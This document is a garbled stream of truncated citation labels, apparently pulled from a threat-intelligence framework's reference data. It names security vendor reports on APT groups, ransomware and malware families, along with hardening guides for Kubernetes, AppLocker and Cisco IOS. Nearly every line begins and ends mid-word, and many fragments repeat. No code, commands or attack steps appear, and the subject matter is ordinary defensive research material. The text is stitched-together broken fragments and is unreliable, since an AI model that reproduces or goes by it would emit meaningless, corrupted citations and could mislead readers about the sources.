maredon April 2020),(Citation: Sygnia Elephant Beetle Jan 2022),(Citation: Talos Emotet Jan 2019),(Citation: Trend Micro Tick November 20
on: Check Point Warzone Feb 2020),(Citation: Bitdefender APT28 Dec 2015),(Citation: Medium Metamorfo Apr 2020),(Citation: FireEye FIN
Removable Media Control)

tus APR 2024),(Citation: ANSSI Nobelium Phishing December 2021),(Citation: Malwarebytes Kimsuky June 2021),(Citation: MSTIC DEV-053

diant Cutting Edge January 2024),(Citation: Unit42 Agrius 2023),(Citation: ESET ForSSHe December 2018),(Citation: ESET Ebury Feb 2014),(

(Citation: Red Canary SocGholish March 2024),(Citation: Microsoft Unidentified Dec 2018),(Citation: McAfee Lazarus Jul 2020),(Citation: Se
nard TAG 2023),(Citation: Microsoft Volt Typhoon May 2023),(Citation: ORB Mandiant),(Citation: Volexity Ivanti Global Exploitation January
Citation: TrendMicro EarthLusca 2022),(Citation: Secureworks BRONZE SILHOUETTE May 2023),(Citation: Gigamon Berserk Bear October 20

d Future Turla Infra 2020),

tion: Docker Daemon Socket Protect),(Citation: Kubernetes RBAC),(Citation: Kubernetes API Control Access),(Citation: Kubernetes Admissi
(Citation: Kubernetes RBAC),(Citation: Kubernetes API Control Access),(Citation: Microsoft AKS Azure AD 2023),(Citation: Kubernetes Cloud

19),(Citation: Mandiant FIN12 Oct 2021),(Citation: GitHub Pupy),(Citation: Booz Allen Hamilton),(Citation: Github PowerShell Empire),(Cita
KEDHAM June 2021),(Citation: aptsim),(Citation: Ensilo Darkgate 2018),(Citation: Mandiant FIN12 Oct 2021),(Citation: Symantec Calisto July
ation: Microsoft driver block rules),(Citation: Malicious Driver Reporting Center)
Point Dok),(Citation: Trend Micro MacOS Backdoor November 2020),(Citation: CoinTicker 2019),(Citation: MacKeeper Bundlore Apr 2019),
Objective See Green Lambert for OSX Oct 2021),(Citation: sentinelone apt32 macOS backdoor 2020),(Citation: CISA AppleJeus Feb 2021),(C
m-Ukraine-2022),(Citation: Trend Micro TeamTNT),(Citation: Anomali Rocke March 2019),(Citation: GitHub Pupy),(Citation: ANSSI Sandwo
16),(Citation: Cylance Shell Crew Feb 2017),(Citation: F-Secure CozyDuke),(Citation: Kaspersky Carbanak),(Citation: PWC KeyBoys Feb 2017)
20),(Citation: Trend Micro Muddy Water March 2021),(Citation: FireEye APT35 2018),(Citation: Malwarebytes Agent Tesla April 2020),(Cita

ecureworks Karagany July 2019),(Citation: GitHub QuasarRAT),(Citation: ESET Operation Groundbait),(Citation: GitHub LaZagne Dec 2018),
Calisto July 2018),(Citation: Objective See Green Lambert for OSX Oct 2021),(Citation: Symantec Calisto July 2018),(Citation: objsee mac m
Citation: Kaspersky Ferocious Kitten Jun 2021),(Citation: Cyberreason Anchor December 2019),(Citation: FoxIT Wocao December 2019),(C

g Jun 2019),(Citation: FireEye APT34 July 2019),(Citation: Delpy Mimikatz Crendential Manager),(Citation: Mandiant FIN12 Oct 2021),(Citati
n: Microsoft WhisperGate January 2022),(Citation: McAfee Sodinokibi October 2019),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: Cisco

niversity of Birmingham C2)

,(Citation: Kaspersky ToddyCat June 2022),(Citation: FireEye APT30),(Citation: Unit42 RDAT July 2020),(Citation: McAfee Oceansalt Oct 201
Kaspersky Sofacy),(Citation: Kaspersky Carbanak),(Citation: FireEye SMOKEDHAM June 2021),(Citation: Mandiant Pulse Secure Zero-Day A
t SynAck Doppelgänging May 2018),(Citation: Deep Instinct Black Basta August 2022),(Citation: NHS Digital Egregor Nov 2020),(Citation: Ch

ESET Casbaneiro Oct 2019),

lo Darkgate 2018),(Citation: unit42_gamaredon_dec2022),(Citation: Mandiant Cutting Edge Part 2 January 2024),(Citation: ESET Okrum Jul
CrowdStrike StellarParticle January 2022),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: Dell P2P ZeuS),(Citation:
2018),(Citation: US-CERT FALLCHILL Nov 2017),(Citation: PWC KeyBoys Feb 2017),(Citation: Mandiant Cutting Edge Part 2 January 2024),(C
tion: FireEye APT29),(Citation: Unit42 RDAT July 2020),(Citation: Proofpoint TA459 April 2017),(Citation: ESET LightNeuron May 2019),(Cita
m Group August 2023),(Citation: CrowdStrike Grim Spider May 2019),(Citation: ClearSky Siamesekitten August 2021),(Citation: Mandiant Su
Citation: Secureworks Karagany July 2019),(Citation: Mandiant Pulse Secure Zero-Day April 2021),(Citation: ESET Operation Groundbait),(Ci
olarWinds),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: SecureWorks BRONZE UNION June 2017),(Citation: Symantec Ci
POSHSPY April 2017),(Citation: Kaspersky Lyceum October 2021),(Citation: Mythc Documentation),(Citation: Unit42 RDAT July 2020),(Citati
ember 2020),(Citation: Crowdstrike TELCO BPO Campaign December 2022),(Citation: Amazon S3 Security, 2019),(Citation: Amazon AWS T

evices 2018)

020),(Citation: Leonard TAG 2023),(Citation: Google Cloud APT41 2024),(Citation: ANSSI Sandworm January 2021),(Citation: Cybersecurity A
2022),(Citation: MSTIC Octo Tempest Operations October 2023),(Citation: NCC Group LAPSUS Apr 2022),

OB Communications)
(Citation: MSTIC DEV-0537 Mar 2022),(Citation: Crowdstrike TELCO BPO Campaign December 2022),(Citation: NCC Group LAPSUS Apr 202
port March 2021),(Citation: Sygnia Elephant Beetle Jan 2022),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: Malwarebytes Saint Bot Apri
Forcepoint Monsoon),(Citation: Eset Ramsay May 2020),(Citation: group-ib_redcurl2),(Citation: CISA AA20-259A Iran-Based Actor Septem
on Groundbait),(Citation: ESET Crutch December 2020),(Citation: ESET EvasivePanda 2023),(Citation: Eset Ramsay May 2020),(Citation: F-S
lLabs Metador Technical Appendix Sept 2022),(Citation: Secureworks DarkTortilla Aug 2022),(Citation: Zscaler Pikabot 2023),(Citation: Trel

tion: Ready.gov IT DRP)

oup Black Basta June 2022),(Citation: Sophos BlackCat Jul 2022),(Citation: Trend Micro Black Basta May 2022),(Citation: Microsoft BlackCat
2020),(Citation: Unit 42 KerrDown February 2019),(Citation: MSTIC FoggyWeb September 2021),(Citation: PWC WellMess July 2020),(Cita
isco Talos Intelligence Group),(Citation: Kubernetes Hardening Guide),(Citation: Docker Daemon Socket Protect),(Citation: Kubernetes RBA

mware Advisory December 2023),(Citation: FireEye TRITON Dec 2017),(Citation: McAfee Lazarus Jul 2020),(Citation: Microsoft Deep Dive So

ers January 2022),(Citation: Microsoft BlackCat Jun 2022),(Citation: CERT-EE Gamaredon January 2021),(Citation: Crowdstrike DriveSlayer
March 2022),(Citation: Cisco Ukraine Wipers January 2022),(Citation: Microsoft WhisperGate January 2022),(Citation: Cisco CaddyWiper Ma
: Volexity SolarWinds),(Citation: Google Cloud APT41 2024),(Citation: NCC Group Team9 June 2020),(Citation: Red Canary SocGholish Marc

Citation: apt41_mandiant),(Citation: Crowdstrike Indrik November 2018),(Citation: Mandiant_UNC2165),(Citation: Check Point Meteor Aug
Profile),(Citation: Azure AD Federation Vulnerability),
ocGholish Infrastructure November 2022),(Citation: Secureworks Gold Prelude Profile),(Citation: Bitdefender StrongPity June 2020),(Citatio
021),(Citation: Mandiant Suspected Turla Campaign February 2023),(Citation: Proofpoint TA2541 February 2022),(Citation: Unit 42 Gamare

Micro Conficker),(Citation: Secureworks GOLD CABIN),(Citation: Cybereason Bazar July 2020),(Citation: Securelist Brazilian Banking Malwar
8),(Citation: Korean FSI TA505 2020),(Citation: Trend Micro njRAT 2018),
n: Cadet Blizzard emerges as novel threat actor),(Citation: CISA GRU29155 2024),(Citation: Binary Defense Emotes Wi-Fi Spreader),(Citation
: Microsoft Star Blizzard August 2022),(Citation: Microsoft Manage Mail Flow Rules 2023),(Citation: Microsoft Tim McMichael Exchange Ma
Eye APT35 2018),(Citation: McAfee Night Dragon),(Citation: CIS Emotet Dec 2018),(Citation: ESET WinterVivern 2023),(Citation: Github Pow
Advisory December 2023),(Citation: NCC Group Chimera January 2021),(Citation: GitHub MailSniper),(Citation: Volexity SolarWinds),(Cita
et Emotet May 2017),(Citation: Secureworks BRONZE PRESIDENT December 2019),(Citation: Red Canary NETWIRE January 2020),(Citation
020),(Citation: CISA AR21-126A FIVEHANDS May 2021),(Citation: Bitdefender APT28 Dec 2015),(Citation: FRP GitHub),(Citation: Medium M
Hi-Zor),(Citation: Sofacy Komplex Trojan),(Citation: Trend Micro Tick November 2019),(Citation: Proofpoint Azorult July 2018),(Citation: US-
on: CERT-EU DDoS March 2017)

Intezer TeamTNT September 2020),(Citation: Kubernetes Hardening Guide),(Citation: Kubernetes Security Context)

m October 2021),(Citation: ESET Lazarus Jun 2020),(Citation: Mandiant FIN12 Oct 2021),(Citation: US District Court Indictment GRU Unit 744
tion: ESET Dukes October 2019),(Citation: CISA Star Blizzard Advisory December 2023),(Citation: Google EXOTIC LILY March 2022),(Citation

ation: Github PowerShell Empire),(Citation: FireEye APT29 Domain Fronting),(Citation: RSA Shell Crew),(Citation: Windows Commands JPC
ender Application Control),(Citation: Corio 2008),(Citation: TechNet Applocker vs SRP)
s JPCERT),(Citation: NSA MS AppLocker),(Citation: Beechey 2010),(Citation: Microsoft Windows Defender Application Control),(Citation: Co
Feb 2020),(Citation: NorthSec 2015 GData Uroburos Tools),(Citation: ESET Sednit Part 2),(Citation: ESET Zebrocy May 2019),(Citation: ESET

Rabbit 2018),
017),(Citation: SentinelLabs Metador Sept 2022),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: Kaspersky Lyceum Octo
SentinelOne NobleBaron June 2021),(Citation: CrowdStrike SUNSPOT Implant January 2021),(Citation: TrendMicro RaspberryRobin 2022),
y 2022),(Citation: Novetta Winnti April 2015),(Citation: ESET InvisiMole June 2020),(Citation: Kaspersky Equation QA),(Citation: Twitter ItsR
July 2021),(Citation: CrowdStrike SUNSPOT Implant January 2021),
(Citation: Talos PoetRAT April 2020),(Citation: AADInternals Documentation),(Citation: CISA Play Ransomware Advisory December 2023),(C
aign July 2021),(Citation: TechNet Firewall Design)

tion: ESET ForSSHe December 2018),(Citation: objective-see windtail2 jan 2019),(Citation: Rclone),(Citation: Microsoft FTP),(Citation: ESET
ation: Trusteer Carberp October 2010),(Citation: MSTIC FoggyWeb September 2021),(Citation: Palo Alto Unit 42 OutSteel SaintBot Februa

tation: Securelist Machete Aug 2014),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Avira Mustang Panda January 2020),(Citati
Molerats Dec 2020),(Citation: MalwareBytes Ngrok February 2020),

2020),(Citation: Google Cloud APT41 2024),(Citation: Malwarebytes RokRAT VBA January 2021),(Citation: Sygnia Emperor Dragonfly Octob

Citation: Mandiant Pulse Secure Zero-Day April 2021),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: CrowdStrike PIONEER KITTEN A
ars March 2020),(Citation: Lumen Versa 2024),(Citation: Cybersecurity Advisory SVR TTP May 2021),(Citation: Palo Alto Unit 42 OutSteel S
pedia Control Flow Integrity)
dia Control Flow Integrity)
V-0537 Mar 2022),(Citation: Unit42 AcidBox June 2020),(Citation: Group IB Cobalt Aug 2017),(Citation: Kaspersky ProjectSauron Technical
Panda May 2019),(Citation: ClearkSky Fox Kitten February 2020),(Citation: Talos Nyetya June 2017),(Citation: FireEye KEGTAP SINGLEMALT
on: Cybereason Soft Cell June 2019),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: Crowdstrike TELCO BPO Campaign December 2022),(
mantec Orangeworm April 2018),(Citation: PaloAlto CardinalRat Apr 2017),(Citation: Kaspersky Lyceum October 2021),(Citation: Mythc Do
KeyBoys Feb 2017),(Citation: MSTIC FoggyWeb September 2021),(Citation: S2 Grupo TrickBot June 2017),(Citation: CISA AR21-126A FIVEH

March 2019),(Citation: Lumen KVBotnet 2023),(Citation: ESET OceanLotus macOS April 2019),(Citation: Aqua Kinsing April 2020),(Citation: C
New Ryuk Attack October 2020),(Citation: LogRhythm WannaCry),(Citation: Cisco CaddyWiper March 2022),(Citation: Microsoft PLATINUM
mware as a Service),(Citation: SOCRadar INC Ransom January 2024),(Citation: Unit42 SilverTerrier 2016),(Citation: Trellix Scattered Spider

APT Energy Oct 2017),(Citation: US-CERT SMB Security)

e ADFS),(Citation: Microsoft SolarWinds Customer Guidance),(Citation: Mandiant Defend UNC2452 White Paper)

(Citation: Mandiant FIN13 Aug 2022),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: ClearSky Siamesekitten August 2021),(Citation: CISA
V-0537 Mar 2022),(Citation: Crowdstrike TELCO BPO Campaign December 2022),(Citation: IBM ITG18 2020),(Citation: CISA AA21-200A APT
tation: TrendMicro Pikabot 2024),(Citation: Azure AD Recon),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Amn

038A PRC Critical Infrastructure February 2024),

ugust 2021),(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024),

ll Empire),(Citation: GitHub Bloodhound),

),(Citation: Shlayer jamf gatekeeper bypass 2021),(Citation: Tarrask scheduled task),(Citation: Microsoft File Folder Exclusions)

AA23-129A Snake Malware May 2023),(Citation: FireEye Bootkits),

phant Beetle Jan 2022),(Citation: Sofacy Komplex Trojan),(Citation: TrendMicro Tropic Trooper Mar 2018),(Citation: McAfee Lazarus Resur

T Nomadic Octopus 2018),(Citation: McAfee APT28 DDE1 Nov 2017),(Citation: objective-see windtail1 dec 2018),(Citation: Malwarebytes A

uly 2020),(Citation: Cisco DNSMessenger March 2017),(Citation: LOLBAS Esentutl),(Citation: Crowdstrike Indrik November 2018),(Citation:

18),(Citation: Symantec Daggerfly 2024),(Citation: Elastic Pikabot 2024),(Citation: TrendMicro RaspberryRobin 2022),(Citation: NCSC-NL CO

king Malware July 2020),(Citation: ZScaler Hacking Team),(Citation: CrowdStrike AQUATIC PANDA December 2021),(Citation: FireEye APT1
ugust 2022),(Citation: Trend Micro Tick November 2019),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: Unit 42 KerrD
24),(Citation: Intezer HiddenWasp Map 2019),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: trendmicro xcsset xcode project 2020),

ess),(Citation: Microsoft Application Lockdown),(Citation: Windows Commands JPCERT),(Citation: NSA MS AppLocker),(Citation: Microsoft
on Lockdown),(Citation: Windows Commands JPCERT),(Citation: NSA MS AppLocker),(Citation: Microsoft Windows Defender Application C
on Lockdown),(Citation: Windows Commands JPCERT),(Citation: NSA MS AppLocker),(Citation: Microsoft Windows Defender Application C

BRONZE UNION June 2017),(Citation: Dragos Crashoverride 2018),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: def_e

A BeagleBoyz August 2020),(Citation: US-CERT HARDRAIN March 2018),(Citation: Novetta Blockbuster Tools),(Citation: Novetta Blockbuste
CrowdStrike AQUATIC PANDA December 2021),(Citation: McAfee Maze March 2020),(Citation: Palo Alto Unit 42 OutSteel SaintBot Februa

ear December 2019),(Citation: SecureWorks BRONZE STARLIGHT Ransomware Operations June 2022),(Citation: Crowdstrike DriveSlayer Fe
nd Micro AvosLocker Apr 2022),(Citation: Cyble Black Basta May 2022),(Citation: Palo Alto Networks Black Basta August 2022),(Citation: M

on: apt41_mandiant),(Citation: Cadet Blizzard emerges as novel threat actor),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: Crowdstrike

itation: Microsoft Deep Dive Solorigate January 2021),(Citation: Proofpoint TA505 October 2019),(Citation: Mandiant Pulse Secure Zero-Da
TeamTNT),(Citation: Securelist APT10 March 2021),(Citation: Kaspersky ThreatNeedle Feb 2021),(Citation: DFIR Report APT35 ProxyShell

2021),(Citation: NCC Group Team9 June 2020),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: Secureworks MCMD July 2019),(C
tion: NCC Group Chimera January 2021),(Citation: CISA Play Ransomware Advisory December 2023),(Citation: Google Cloud APT41 2024),(
: ESET Grandoreiro April 2020),(Citation: Dell Sakula),(Citation: TrendMicro Gamaredon April 2020),(Citation: Fidelis Turbo),(Citation: Unit
siMole June 2018),

tion: CrowdStrike Putter Panda),(Citation: Fidelis Turbo),(Citation: Prevailion EvilNum May 2020),(Citation: CISA AA20-239A BeagleBoyz Aug

ebruary 2019),(Citation: PWC KeyBoys Feb 2017),(Citation: PWC WellMess July 2020),(Citation: MSTIC FoggyWeb September 2021),(Citatio
WastedLocker June 2020),(Citation: CarbonBlack RobbinHood May 2019),(Citation: Cisco H1N1 Part 2),(Citation: Kroll Royal Deep Dive Feb
tion: Cybereason Chaes Nov 2020),(Citation: ESET Kobalos Jan 2021),(Citation: Huntress NPPSPY 2022),(Citation: Lumen Versa 2024),
n),(Citation: Microsoft PLATINUM April 2016),(Citation: Github PowerShell Empire),(Citation: Unit 42 NOKKI Sept 2018),(Citation: TrendMic
ança Informática URSA Sophisticated Loader 2020),(Citation: group-ib_redcurl2),(Citation: Symantec Calisto July 2018),(Citation: SCILabs M
ne 2017),(Citation: Talos Agent Tesla Oct 2018),(Citation: Kaspersky NetTraveler),(Citation: Kaspersky Carbanak),(Citation: ASERT Donot Ma
y Ivanti Zero-Day Exploitation January 2024),
2022),(Citation: Mandiant ROADSWEEP August 2022),(Citation: RotaJakiro 2021 netlab360 analysis),(Citation: Joint Cybersecurity Advisory
Elastic Latrodectus May 2024),(Citation: TrendMicro RaspberryRobin 2022),(Citation: ESET Gelsemium June 2021),(Citation: ClearSky Siame
Talos Bitter Bangladesh May 2022),(Citation: Symantec Gallmaker Oct 2018),(Citation: Rewterz Sidewinder COVID-19 June 2020),(Citation:
: TechNet Copy),(Citation: Microsoft FTP),(Citation: LOLBAS Expand),(Citation: Huntress INC Ransom Group August 2023),(Citation: Cybere
tion: CISA GRU29155 2024),(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024),(Citation: Crowdstrike HuntReport 2022),
ater February 2022),(Citation: objective-see windtail1 dec 2018),(Citation: Sygnia Elephant Beetle Jan 2022),(Citation: FireEye APT10 Sept

uly 2020),(Citation: Trellix Darkgate 2023),(Citation: Seqrite DoubleExtension),(Citation: HowToGeek ShowExtension)

egin),(Citation: Securelist ScarCruft Jun 2016),(Citation: TrendMicro Patchwork Dec 2017),(Citation: Bitdefender FunnyDream Campaign No
ation: US-CERT TA18-074A),(Citation: Proofpoint TA505 Jan 2019),(Citation: Dragos Crashoverride 2018),(Citation: Kaspersky Flame),
2),(Citation: Secureworks BRONZE SILHOUETTE May 2023),(Citation: Group IB Ransomware September 2020),(Citation: Trend Micro AvosL
ation: Cybereason Bazar July 2020),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: Trend Micro Tick November 2019),(Citation: Kas
tation: Sygnia Elephant Beetle Jan 2022),(Citation: Malwarebytes Saint Bot April 2021),(Citation: Cybereason Bazar July 2020),(Citation: Cro
n: Qualys LolZarus),(Citation: Trellix Darkgate 2023),(Citation: Kaspersky Lyceum October 2021),(Citation: F-Secure CozyDuke),
mber 2019),(Citation: Scarlet Mimic Jan 2016),

d_rev_enc),(Citation: Mandiant Azure AD Backdoors),(Citation: MagicWeb),(Citation: EnableMPRNotifications),(Citation: TechNet Credenti

hNet Credential Theft)

Trends 2020)

Instinct Black Basta August 2022),(Citation: CME Github September 2018),(Citation: Cylance Shell Crew Feb 2017),(Citation: Huntress NPP
surance - TACACS),(Citation: NIST 800-63-3),(Citation: Cisco IOS Software Integrity Assurance - Deploy Signed IOS)
surance - TACACS),(Citation: NIST 800-63-3),(Citation: Cisco IOS Software Integrity Assurance - Deploy Signed IOS)
ntegrity Assurance - Secure Boot),(Citation: Cisco IOS Software Integrity Assurance - TACACS),(Citation: NIST 800-63-3),(Citation: Cisco IOS
Citation: MSTIC DEV-0537 Mar 2022),(Citation: FoxIT Wocao December 2019),
cember 2022),(Citation: Suspected Russian Activity Targeting Government and Business Entities Around the Globe),(Citation: Microsoft Com
ay 2024),(Citation: FireEye APT30),(Citation: Zscaler Bazar September 2020),(Citation: FireEye APT17),(Citation: FireEye Operation Double T
022),(Citation: Unit42 Emissary Panda May 2019),(Citation: Cyble Egregor Oct 2020),(Citation: Malwarebytes Saint Bot April 2021),(Citation

P GitHub),(Citation: ANSSI Sandworm January 2021),(Citation: cobaltstrike manual),(Citation: Symantec Palmerworm Sep 2020),(Citation: M
: Trend Micro DRBControl February 2020),(Citation: ESET Turla Lunar toolset May 2024),(Citation: Trend Micro Qakbot May 2020),(Citation
FoggyWeb September 2021),(Citation: Impacket Tools),(Citation: Debian nbtscan Nov 2019),(Citation: Charles McLellan March 2016),(Cita
idelis Turbo),(Citation: Lumen Versa 2024),(Citation: Umbreon Trend Micro),(Citation: Check Point Warzone Feb 2020),(Citation: FRP GitHu
ab360 rotajakiro vs oceanlotus),(Citation: FireEye Metamorfo Apr 2018),(Citation: Fidelis Turbo),(Citation: FireEye FIN7 Aug 2018),(Citation
Chafer May 2020),(Citation: F-Secure The Dukes),(Citation: Symantec Dragonfly),(Citation: Symantec Daggerfly 2023),(Citation: FireEye CA

ter Nov 2017),(Citation: FireEye APT34 July 2019),(Citation: Mandiant APT1),(Citation: FireEye APT33 Guardrail),(Citation: FireEye APT35 2
ation: Cobalt Strike Manual 4.3 November 2020),(Citation: Microsoft 365 Defender Solorigate),(Citation: MSTIC DEV-0537 Mar 2022),(Cita
Strike IceApple May 2022),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: Impacket Tools),(Citation: GitHub LaZagne
ke),(Citation: GitHub LaZagne Dec 2018),(Citation: Group IB APT 41 June 2021),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citatio
utl),(Citation: Sygnia Elephant Beetle Jan 2022),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: CME Github September 2018),(Citation: Fir

Citation: FireEye KEGTAP SINGLEMALT October 2020),(Citation: F-Secure CozyDuke),(Citation: PWC Cloud Hopper Technical Annex April 20
ce Shell Crew Feb 2017),(Citation: Unit 42 KerrDown February 2019),(Citation: CrowdStrike SUNSPOT Implant January 2021),(Citation: Mo
n: ESET OceanLotus Mar 2019),(Citation: SentinelOne NobleBaron June 2021),(Citation: Symantec Orangeworm April 2018),(Citation: Tren
DA December 2021),(Citation: FireEye APT19),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: Unit 42 QUADAGENT July 201
ET Gamaredon June 2020),(Citation: Trend Micro njRAT 2018),(Citation: ClearSky MuddyWater Nov 2018),(Citation: PaloAlto CardinalRat A
ne 2022),(Citation: Microsoft Actinium February 2022),(Citation: NCC Group Team9 June 2020),(Citation: Mandiant ROADSWEEP August 2
24),(Citation: Microsoft Unidentified Dec 2018),(Citation: GitHub PSImage),(Citation: FireEye SMOKEDHAM June 2021),(Citation: Joint Cybe
orSSHe December 2018),(Citation: Emissary Trojan Feb 2016),(Citation: Unit 42 Sofacy Feb 2018),(Citation: Dell Sakula),(Citation: Cisco Uk
owmint June 2020),(Citation: ESET ComRAT May 2020),(Citation: McAfee Sodinokibi October 2019),(Citation: ESET OceanLotus Mar 2019)

rend Micro Waterbear December 2019),(Citation: Cyberint Qakbot May 2021),(Citation: FireEye TEMP.Veles 2018),(Citation: Leonardo Tur

tion: NHS Digital Egregor Nov 2020),(Citation: ASERT Donot March 2018),(Citation: Secureworks Karagany July 2019),(Citation: Palo Alto Un
s October 2019),(Citation: Unit42 RDAT July 2020),(Citation: Securelist ScarCruft May 2019),(Citation: Symantec RAINDROP January 2021),

ender Sardonic Aug 2021),(Citation: Mandiant FIN12 Oct 2021),(Citation: Google Cloud APT41 2024),(Citation: DFIR Ryuk 2 Hour Speed Run
tion: Phish Labs Silent Librarian),(Citation: CISA AppleJeus Feb 2021),

(Citation: CrowdStrike AQUATIC PANDA December 2021),(Citation: McAfee Night Dragon),(Citation: CISA GRU29155 2024),(Citation: Proof
ation: MSTIC DEV-0537 Mar 2022),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: CrowdStrike AQUATIC PANDA December 2021),(C

s Office Persistence Add-ins),(Citation: SensePost Outlook Forms),(Citation: SensePost Outlook Home Page),(Citation: win10_asr)

ce Persistence Add-ins)

on: Symantec Orangeworm April 2018),(Citation: FireEye Targeted Attacks Middle East Banks),(Citation: CME Github September 2018),(Cit
ESET Machete July 2019),(Citation: ESET ComRAT May 2020),(Citation: Palo Alto MoonWind March 2017),(Citation: Kaspersky TajMahal Ap
hor December 2019),(Citation: IBM TA505 April 2020),(Citation: Mandiant FIN13 Aug 2022),(Citation: Volexity SolarWinds),(Citation: FOX-I

m Group August 2023),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: Symantec Orangeworm April 2018),(Citation: CME Github Septemb
LENTTRINITY Modules July 2019),(Citation: Symantec Orangeworm April 2018),(Citation: Kaspersky Lyceum October 2021),(Citation: Joint
Royal AA23-061A March 2023),(Citation: SentinelOne INC Ransomware),(Citation: Cybereason Royal December 2022),(Citation: Novetta-A
HT Active Measures March 2017),(Citation: Microsoft Targeting Elections September 2020),(Citation: Google Election Threats October 202
2020),(Citation: Rewterz Sidewinder APT April 2020),(Citation: MalwareBytes SideCopy Dec 2021),(Citation: US-CERT TA18-074A),(Citation
y December 2023),(Citation: ATT Sidewinder January 2021),(Citation: Microsoft Moonstone Sleet 2024),(Citation: Secureworks IRON TWIL

Dec 2018),(Citation: Juniper IcedID June 2020),(Citation: Deep Instinct Black Basta August 2022),(Citation: Malwarebytes Saint Bot April 20
on: Cybereason Bazar July 2020),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: Palo Alto Unit 42 OutSteel SaintBot Fe

tion: MSTIC NOBELIUM May 2021),(Citation: Kaspersky ToddyCat June 2022),(Citation: FireEye Operation Saffron Rose 2013),(Citation: Fire

on WhisperGate February 2022),(Citation: Cisco Ukraine Wipers January 2022),(Citation: Novetta Blockbuster),(Citation: Microsoft Whispe

e - Image File Verification),(Citation: Cisco IOS Software Integrity Assurance - Change Control)
(Citation: TCG Trusted Platform Module)
re Boot),(Citation: Cisco IOS Software Integrity Assurance - Change Control),(Citation: Cisco IOS Software Integrity Assurance - TACACS),(Ci
2021),(Citation: Check Point Warzone Feb 2020),(Citation: Medium Metamorfo Apr 2020),(Citation: CrowdStrike Ryuk January 2019),(Citati
tion: Trend Micro Tick November 2019),(Citation: Cybereason Bazar July 2020),(Citation: Check Point Warzone Feb 2020),(Citation: Microso
Prevx Carberp March 2011),(Citation: ESET Attor Oct 2019),(Citation: CyberBit Early Bird Apr 2018),(Citation: Gigamon BADHATCH Jul 2019
Sploit May 2012),(Citation: TrendMicro Taidoor),(Citation: ESET ComRAT May 2020),(Citation: Gigamon BADHATCH Jul 2019),(Citation: Ma

024),(Citation: ESET GreyEnergy Oct 2018),(Citation: Unit 42 Gorgon Group Aug 2018),(Citation: BiZone Lizar May 2021),(Citation: ESET Inv

itation: Cybereason Bazar July 2020),

Nov 2017),(Citation: Talos Lokibot Jan 2021),(Citation: NCC Group Team9 June 2020),(Citation: Cybereason Bazar July 2020),(Citation: Cybe

teBear Aug 2017),

Citation: Crowdstrike TELCO BPO Campaign December 2022),(Citation: PTSecurity Cobalt Dec 2016),(Citation: Mandiant FIN5 GrrCON Oct 2
tation: ESET Turla Lunar toolset May 2024),(Citation: ESET ForSSHe December 2018),(Citation: Mandiant APT41),(Citation: Objective See G

Water March 2021),(Citation: FireEye MuddyWater Mar 2018),(Citation: FireEye APT10 Sept 2018),(Citation: Mandiant FIN5 GrrCON Oct 2
HyperStack October 2020),(Citation: Mythc Documentation),(Citation: ESET Dukes October 2019),(Citation: NSA/FBI Drovorub August 202
February 2022),(Citation: Symantec Inception Framework March 2018),(Citation: NJCCIC Ursnif Sept 2016),(Citation: ESET Kobalos Feb 20
on: Cisco Talos Bitter Bangladesh May 2022),(Citation: Lastline PlugX Analysis),(Citation: Bitdefender APT28 Dec 2015),(Citation: Microsoft
021),(Citation: Qualys LolZarus),(Citation: SentinelLabs Metador Sept 2022),(Citation: Symantec FIN8 Jul 2023),(Citation: MSTIC FoggyWeb
Citation: ESET EvilNum July 2020),(Citation: Trellix Scattered Spider MO August 2023),(Citation: Trend Micro Muddy Water March 2021),(C
BlackTech June 2017),(Citation: Mandiant FIN12 Oct 2021),(Citation: Palo Alto Brute Ratel July 2022),(Citation: Crowdstrike HuntReport 20
r Microsoft 365),(Citation: Protecting Microsoft 365 From On-Premises Attacks)

ystem Wide Com Keys),(Citation: Microsoft Disable DCOM),(Citation: Microsoft Protected View),(Citation: Microsoft Process Wide Com Ke
gust 2023),(Citation: FireEye APT40 March 2019),(Citation: Talos ZxShell Oct 2014),(Citation: Group IB Cobalt Aug 2017),(Citation: Proofpoi
Citation: Sygnia Elephant Beetle Jan 2022),(Citation: Symantec Chafer February 2018),(Citation: Talos Nyetya June 2017),(Citation: Symant
mpire),(Citation: Volexity Ivanti Zero-Day Exploitation January 2024),(Citation: FireEye TRITON 2019),(Citation: Cisco Talos Intelligence Grou
Warzone Feb 2020),(Citation: Prevx Carberp March 2011),(Citation: Trickbot VNC module July 2021),(Citation: Microsoft Actinium Februar
021),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: SecureWorks BRONZE UNION June 2017),(Citation: DHS/CISA Ransomw
FIN5 GrrCON Oct 2016),(Citation: CME Github September 2018),(Citation: Roadtools),(Citation: ASERT Donot March 2018),(Citation: Palo A
IRON TWILIGHT Active Measures March 2017),(Citation: Avira Mustang Panda January 2020),(Citation: Kaspersky Darkhotel),(Citation: Thr

ber 2018),(Citation: FireEye APT41 Aug 2019),(Citation: Cado Security TeamTNT Worm August 2020),(Citation: ESET LoudMiner June 2019),

orub August 2020),(Citation: Umbreon Trend Micro),(Citation: ESET Sednit Part 3),(Citation: Check Point Warzone Feb 2020),(Citation: ESET
